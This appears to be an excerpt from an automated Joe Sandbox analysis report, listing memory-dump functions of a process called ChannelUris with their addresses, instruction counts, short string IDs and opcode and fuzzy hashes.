                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $#
                                                                                                            • API String ID: 0-2491617062
                                                                                                            • Opcode ID: 192dfaac804ef015f3213740f9906ce63f3487b11428dfd4402b9296adeba238
                                                                                                            • Instruction ID: 75da4d55a46fe4c0e1cd9a56ce606c4d80e88cee387843c1726b65f9cb9eb385
                                                                                                            • Opcode Fuzzy Hash: 192dfaac804ef015f3213740f9906ce63f3487b11428dfd4402b9296adeba238
                                                                                                            • Instruction Fuzzy Hash: 0A41E374A08218CFDF04CFA4C4487EDBBB1FB4A314F5485A9D021A72A0EB78B985DF64
                                                                                                            Function 093AEDF0 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: d
                                                                                                            • API String ID: 0-2564639436
                                                                                                            • Opcode ID: ef742d9dac603ce901cf7e9575a87ea8062df124a71824461002380a86d3d6b8
                                                                                                            • Instruction ID: 187079d5737aa4f5e8413b6238a6776fa6a7ca2bb221c1d7186db2dffcef969e
                                                                                                            • Opcode Fuzzy Hash: ef742d9dac603ce901cf7e9575a87ea8062df124a71824461002380a86d3d6b8
                                                                                                            • Instruction Fuzzy Hash: 52D15A35600602CFCB24CF28C484A6ABBF2FF88314B15C569E55A9B761DB35F846CF95
                                                                                                            Function 092B65F8 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: b&v
                                                                                                            • API String ID: 0-2149105869
                                                                                                            • Opcode ID: 03613c9154a1e7d7229c8f4d59d75f990f499f4cad76d7cfaff86cf76078447d
                                                                                                            • Instruction ID: e5e23b47e6c14ece2124c92f56de68ffdef89044133356185f4ad4d8f4cf1225
                                                                                                            • Opcode Fuzzy Hash: 03613c9154a1e7d7229c8f4d59d75f990f499f4cad76d7cfaff86cf76078447d
                                                                                                            • Instruction Fuzzy Hash: 1B31E274E01209DFDB08DFA9D454AEEBBB6FF88310F10802AE955A7364DB315942CF91
                                                                                                            Function 093A5289 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: V
                                                                                                            • API String ID: 0-1342839628
                                                                                                            • Opcode ID: 100918dedfb9b67742a2f9e702bfc027c86d2fad69852cfc928b10f0b26c02cc
                                                                                                            • Instruction ID: 57efa3ad29cb3fffe623576842980e856e47f0e3d62ff939f5be0be84da3047b
                                                                                                            • Opcode Fuzzy Hash: 100918dedfb9b67742a2f9e702bfc027c86d2fad69852cfc928b10f0b26c02cc
                                                                                                            • Instruction Fuzzy Hash: D9219878A00268CFCB259B24D89879DBBF5FB49341F0056EAE58AA7284DB705F84CF50
                                                                                                            Function 093A6103 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: J
                                                                                                            • API String ID: 0-1141589763
                                                                                                            • Opcode ID: 94126df09db7e83be79483478d8152313b168c45c76879bcf08b12b567e6aaf6
                                                                                                            • Instruction ID: 96fddc32caf62a3cb86ff40ceaa8d089157a49f6d3de55e177e08739b55fe463
                                                                                                            • Opcode Fuzzy Hash: 94126df09db7e83be79483478d8152313b168c45c76879bcf08b12b567e6aaf6
                                                                                                            • Instruction Fuzzy Hash: 9221D678905269CFDB64DF24D8587D9BBB0FF0A305F1085DAD89AA2640EB740EC1CF51
                                                                                                            Function 092BAEB1 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: -
                                                                                                            • API String ID: 0-405794996
                                                                                                            • Opcode ID: 93b63351be57ec11ea8af613fe58dc12aa8845bc4dccd97ce8a1b87527ab7485
                                                                                                            • Instruction ID: 9f6717fe918068d2ea58dac694c455d67b43df1f888fd467652cb9542e7d8c31
                                                                                                            • Opcode Fuzzy Hash: 93b63351be57ec11ea8af613fe58dc12aa8845bc4dccd97ce8a1b87527ab7485
                                                                                                            • Instruction Fuzzy Hash: 7EF0BE76304241AFC710CF29E894C9A7BF9BF9972072141AEF915CB322CA71DC14CB50
                                                                                                            Function 092B04E6 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (
                                                                                                            • API String ID: 0-3887548279
                                                                                                            • Opcode ID: 2fde13d4e767fcdcd8f05ea0796c6cbf9313a6b9503233261cb516f946e62ea1
                                                                                                            • Instruction ID: 25bb680fad460e9b1d2e69693fa10a828dfc04f10c149f59bb059268dda25e2d
                                                                                                            • Opcode Fuzzy Hash: 2fde13d4e767fcdcd8f05ea0796c6cbf9313a6b9503233261cb516f946e62ea1
                                                                                                            • Instruction Fuzzy Hash: DB11D770961229DFEB61CF18D848BEABBB1BB0A345F0081E9D489A6644DB744AC5CF01
                                                                                                            Function 093A8EB2 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: /
                                                                                                            • API String ID: 0-2043925204
                                                                                                            • Opcode ID: 5854608ee28ab41352e7f1c979e9cab79549011f6275720e6b3258a679ba6812
                                                                                                            • Instruction ID: d83653ec6cf156f1afb042f9ed796a049c206d0db4c6f84f571af6f86eaa7977
                                                                                                            • Opcode Fuzzy Hash: 5854608ee28ab41352e7f1c979e9cab79549011f6275720e6b3258a679ba6812
                                                                                                            • Instruction Fuzzy Hash: 21F074748012AACFCBA4DF14D848BECBBB0FB1A341F1045EAD809A2A60DB745AC0DF00
                                                                                                            Function 093A0F51 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: h
                                                                                                            • API String ID: 0-2439710439
                                                                                                            • Opcode ID: 24a7b3694e2093cdeebd71234537cfd352f6344a47bc4887fb83b1788abf8bc2
                                                                                                            • Instruction ID: 96ed88c78bb65ee46257eb1607ca1149c51796a666f7065f1f5696a9670fd378
                                                                                                            • Opcode Fuzzy Hash: 24a7b3694e2093cdeebd71234537cfd352f6344a47bc4887fb83b1788abf8bc2
                                                                                                            • Instruction Fuzzy Hash: F6D09274A04229CFDF658F10C844BD9B6B6FB0A300F4091D99549B3640DA344A89CF06
                                                                                                            Function 078A3F88 Relevance: .6, Instructions: 577COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2474163054.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_78a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b9699a2df3ce436892604357dd276314a1b50e4aba37376bcdd46b9647296853
                                                                                                            • Instruction ID: 375a8ac2947ee16f0a249e85f26869ac2bfe15c823cf01bd500c4813988f42a5
                                                                                                            • Opcode Fuzzy Hash: b9699a2df3ce436892604357dd276314a1b50e4aba37376bcdd46b9647296853
                                                                                                            • Instruction Fuzzy Hash: 9842D5B4E0025AEFEF14CFA8D444AEEBBB1FB69305F108019DA1AA7354C7749846CF51
                                                                                                            Function 092BF7F8 Relevance: .5, Instructions: 536COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 87f410e25cf4be44154c01bb7d8001e0bdaaf2a6a8cd8b2dc02e508ea0d294c9
                                                                                                            • Instruction ID: 2b7ecfd54baef83dbb230f08201ce8f41c4e22dd7f43f0ce46bc236e33e825f8
                                                                                                            • Opcode Fuzzy Hash: 87f410e25cf4be44154c01bb7d8001e0bdaaf2a6a8cd8b2dc02e508ea0d294c9
                                                                                                            • Instruction Fuzzy Hash: 69227B35A102159FDB04DFA8DA94AADBBF2FF88350F148069E905AF395CB75EC41CB90
                                                                                                            Function 093AF2F8 Relevance: .5, Instructions: 486COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1f2289526f4aa04c58982da64a4aaa084a17491f3512178bbe57fe3a5a16f7eb
                                                                                                            • Instruction ID: 80037e00acd5dff059b816877db3fc55013a03d8bb76d80cdb903c3e91744794
                                                                                                            • Opcode Fuzzy Hash: 1f2289526f4aa04c58982da64a4aaa084a17491f3512178bbe57fe3a5a16f7eb
                                                                                                            • Instruction Fuzzy Hash: 71125C31A006058FDB14DFA9C994AAEB7B2FF88301F14852DE5069B7A5DB35EC46CF50
                                                                                                            Function 04B196C0 Relevance: .4, Instructions: 416COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c24f8d4945e29c8bceea699db180261a0ea48ec4c3f36576eefe09f54c823b11
                                                                                                            • Instruction ID: 76970ea5165f497bef15dac76b3241dec9b9e85cc824aa044bf4fe723e6df026
                                                                                                            • Opcode Fuzzy Hash: c24f8d4945e29c8bceea699db180261a0ea48ec4c3f36576eefe09f54c823b11
                                                                                                            • Instruction Fuzzy Hash: 7A020B74A00249DFDB15CF98C494AAEBBB2FF88314F648159E905AB365C735ED82CF90
                                                                                                            Function 078A4AB0 Relevance: .4, Instructions: 362COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2474163054.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_78a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f3523ba85383997a4fa65b928b807d84c292073634a6dd772fcefbeb981c8b94
                                                                                                            • Instruction ID: 60b4202c970eaf5dd767904ddf39b86399b3455c0fe89eec88f90740cb05337b
                                                                                                            • Opcode Fuzzy Hash: f3523ba85383997a4fa65b928b807d84c292073634a6dd772fcefbeb981c8b94
                                                                                                            • Instruction Fuzzy Hash: 30F1C3B4D01258EFEF14DFA8D5986ACBBB2FF59315F204429E40AA7350DB756881CF50
                                                                                                            Function 04B180F1 Relevance: .3, Instructions: 337COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7ac3206aca68f0073c49951100e66e85d28d1b430f81cec77e6cdd34b53656c5
                                                                                                            • Instruction ID: e7dee78c354d2f0b40f7bf9c90cbc5b0896e1b89e2a65591eeeca4d3c7261b04
                                                                                                            • Opcode Fuzzy Hash: 7ac3206aca68f0073c49951100e66e85d28d1b430f81cec77e6cdd34b53656c5
                                                                                                            • Instruction Fuzzy Hash: 1CD10539600604DFDB08EF78D590A6DB7F2FF89315B5085A8E9169B361DB35EC42CBA0
                                                                                                            Function 04B173A8 Relevance: .3, Instructions: 317COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7a60c1b085c1f6dafeccdfdbef4700a0558134304076a6c64f9e7df700f1bc13
                                                                                                            • Instruction ID: c63067169df73e3b6f206966a97b21c94fb450340dfdc4d20337c1456ba38d3b
                                                                                                            • Opcode Fuzzy Hash: 7a60c1b085c1f6dafeccdfdbef4700a0558134304076a6c64f9e7df700f1bc13
                                                                                                            • Instruction Fuzzy Hash: 8CC1CD31A00208DFDB14DFA9D944AADBBB2FF85310F5185A9E8069B365DB34EC49CB90
                                                                                                            Function 093A28A0 Relevance: .3, Instructions: 273COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fab2bd3874d85e5cdee0a56acfc02cc356d5867c79f6e9f018c67b5bfdb20977
                                                                                                            • Instruction ID: dbd51640615c65abf6baee2fbd57e3fce8a3efd6cd79a472701f66247adde34f
                                                                                                            • Opcode Fuzzy Hash: fab2bd3874d85e5cdee0a56acfc02cc356d5867c79f6e9f018c67b5bfdb20977
                                                                                                            • Instruction Fuzzy Hash: 97E1C5B4A42269CFEB64CF24C944B9ABBB1FB89300F1081EAD449A7752DB745EC5CF41
                                                                                                            Function 092BB7B8 Relevance: .2, Instructions: 217COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f4d93d7eb7765b2c454c240c47fa1f1342518b7addb8a4d597b07cac7c282da2
                                                                                                            • Instruction ID: 48a16eafdab6f38392fdeb1d6f3a1fa7c96d9c117619ee1b1f0007dad4492014
                                                                                                            • Opcode Fuzzy Hash: f4d93d7eb7765b2c454c240c47fa1f1342518b7addb8a4d597b07cac7c282da2
                                                                                                            • Instruction Fuzzy Hash: ED818835B112098FDB04DFA4D554AEDBBF2EF88351F248069E816AB381CB35DD42CBA0
                                                                                                            Function 093AE170 Relevance: .2, Instructions: 212COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0dc17f4ff0b88d163385daa20320bf89823ef6c17292773755c34edef69711e3
                                                                                                            • Instruction ID: feafedbaeb5b83d5bbc265adb03193632da205058135ac1ce8c884a5b9a1dabf
                                                                                                            • Opcode Fuzzy Hash: 0dc17f4ff0b88d163385daa20320bf89823ef6c17292773755c34edef69711e3
                                                                                                            • Instruction Fuzzy Hash: 8BA1A0B4E012199FDB14CFA9D984ADDBBF2FF88310F24806AE918AB351D731A955CF50
                                                                                                            Function 04B12AA0 Relevance: .2, Instructions: 208COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bb82ecdf902007243cb45a7a8cc1e93ae5299e93a4e51923e8b2e43cf6b2aeec
                                                                                                            • Instruction ID: b23a6d01200247dcdb36af6359203ffd9563f22d1b8ba828672bc673dd59abbd
                                                                                                            • Opcode Fuzzy Hash: bb82ecdf902007243cb45a7a8cc1e93ae5299e93a4e51923e8b2e43cf6b2aeec
                                                                                                            • Instruction Fuzzy Hash: 40918A74A00249CFCB09CF58C494AAEFBB1FF88310B248599D955AB3A5C735FC51CBA0
                                                                                                            Function 04B17B70 Relevance: .2, Instructions: 192COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 676aa00e1070a8ad466ba7549b6beebe383c7b92fc9bee4c09f163ddbd6406f1
                                                                                                            • Instruction ID: dabcadb0c9758bb29d80befba3748a09c804cb8a747ea39c4a8184fb8ab2bbb2
                                                                                                            • Opcode Fuzzy Hash: 676aa00e1070a8ad466ba7549b6beebe383c7b92fc9bee4c09f163ddbd6406f1
                                                                                                            • Instruction Fuzzy Hash: 76719F30A04245CFDB15DF68C884A9EBBF2FF85314F5489AAE416DB261DB74AC46CB90
                                                                                                            Function 04B17CDE Relevance: .2, Instructions: 188COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 07331b0d96c1de9c9e6f7ca0b89cb32d51d2c39a287266e07783459d4a4e9d95
                                                                                                            • Instruction ID: 754f01cb367a2d57e4b221f0ab4617d0c6898596982f8629439e72f487396b5e
                                                                                                            • Opcode Fuzzy Hash: 07331b0d96c1de9c9e6f7ca0b89cb32d51d2c39a287266e07783459d4a4e9d95
                                                                                                            • Instruction Fuzzy Hash: E1714A31E00248DFDB14DFA4D994AADBBF6FF88344F548469D412AB2A0DF34AC46CB90
                                                                                                            Function 078A0C65 Relevance: .2, Instructions: 185COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2474163054.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_78a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 65c4e2d6625c1fb9f4ddb631244f63339fbab5750edf4bb51b65888a78d54202
                                                                                                            • Instruction ID: 97fb704d2411ac3eb75ab2d75099d93b309d293bbe1d7ae3ec976a35232d29aa
                                                                                                            • Opcode Fuzzy Hash: 65c4e2d6625c1fb9f4ddb631244f63339fbab5750edf4bb51b65888a78d54202
                                                                                                            • Instruction Fuzzy Hash: 7D5124B170020AAFEB246E74841477EB7D2AFB2211F644466D901CB3D1FF36D951D3A1
                                                                                                            Function 092BDE70 Relevance: .2, Instructions: 180COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4aa40046d0a9648513e8b40cc35211d8de727fdfcaa4b00b114e14452e6086c1
                                                                                                            • Instruction ID: 0b42143b5231e8af606ade737a3a5a2b3daa47d923c0aae0016f16e1fe89372f
                                                                                                            • Opcode Fuzzy Hash: 4aa40046d0a9648513e8b40cc35211d8de727fdfcaa4b00b114e14452e6086c1
                                                                                                            • Instruction Fuzzy Hash: 70518C307002048FE729EF38C4546AE77A2BFC9351B14896DE5069B7A0CF79EC06CBA1
                                                                                                            Function 092BBB08 Relevance: .2, Instructions: 161COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cbe77e05a420b0c62adbbe3295ae07d467e9169c60d87acd51c7840019ae4a63
                                                                                                            • Instruction ID: 54bc894b3989488980ac1b0f8bf96d032879d6e2088af7420b9d88f7d27bed7a
                                                                                                            • Opcode Fuzzy Hash: cbe77e05a420b0c62adbbe3295ae07d467e9169c60d87acd51c7840019ae4a63
                                                                                                            • Instruction Fuzzy Hash: 0D51AB34B10206DFDB14CB69D894BAABBF1EF84351F14803AE9059B684CB35E842CB90
                                                                                                            Function 092BB0C8 Relevance: .2, Instructions: 154COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e45aa42c4c96e650f22d0ec97870e1be6cc5a00d7e5309311f649e587444eafa
                                                                                                            • Instruction ID: cacdbb1ffdc555d7bc2cdbae00cc2337d17d63ea81de1f14e47bd73d4cfbf6e2
                                                                                                            • Opcode Fuzzy Hash: e45aa42c4c96e650f22d0ec97870e1be6cc5a00d7e5309311f649e587444eafa
                                                                                                            • Instruction Fuzzy Hash: 6F51E431A116168FCB00CF68D484AAEFBF5FF89360B15869AE515DB282D730EC51CBD0
                                                                                                            Function 04B1B6F9 Relevance: .1, Instructions: 144COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5a4ae6ffc316e71d66bd66888fc441558f803c98cf05ccd81d4047e2f8b3909b
                                                                                                            • Instruction ID: 89cbfa6a2c6f9c4e1a07bdcdd26e172b3b8364cbb206aa1e96c7cf3d9c6ec237
                                                                                                            • Opcode Fuzzy Hash: 5a4ae6ffc316e71d66bd66888fc441558f803c98cf05ccd81d4047e2f8b3909b
                                                                                                            • Instruction Fuzzy Hash: 12517B31B04104CFDB04DF69D498BADB7B2EB88320FA484A6E506973B5DB74BC81DB51
                                                                                                            Function 04B18580 Relevance: .1, Instructions: 140COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5d9c44455386be3d9222dec453dddf94eeaac24ccf0a5aaaa5839e4dde0ee22a
                                                                                                            • Instruction ID: ef71663e46949a41756fd38586f35aaa40583993eafcafb9f725ea8aabb06353
                                                                                                            • Opcode Fuzzy Hash: 5d9c44455386be3d9222dec453dddf94eeaac24ccf0a5aaaa5839e4dde0ee22a
                                                                                                            • Instruction Fuzzy Hash: 3E5119386402009FEB19AF74D55097A7BB3FF89319B504568E9158B361DB36EC41DBB0
                                                                                                            Function 04B19A7D Relevance: .1, Instructions: 135COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7919661b8b446b006b6e00ede9f5a5c0d0a67a62892836279212930c0ef2f711
                                                                                                            • Instruction ID: 62a457ee2c6e30603f6783fc8934969049e193478bc6dde96ee5ad50eb64b78a
                                                                                                            • Opcode Fuzzy Hash: 7919661b8b446b006b6e00ede9f5a5c0d0a67a62892836279212930c0ef2f711
                                                                                                            • Instruction Fuzzy Hash: 4351E974A00249EFDF05CFA8D494A9EBBB2FF88314F248159E905A7365C735EC92DB90
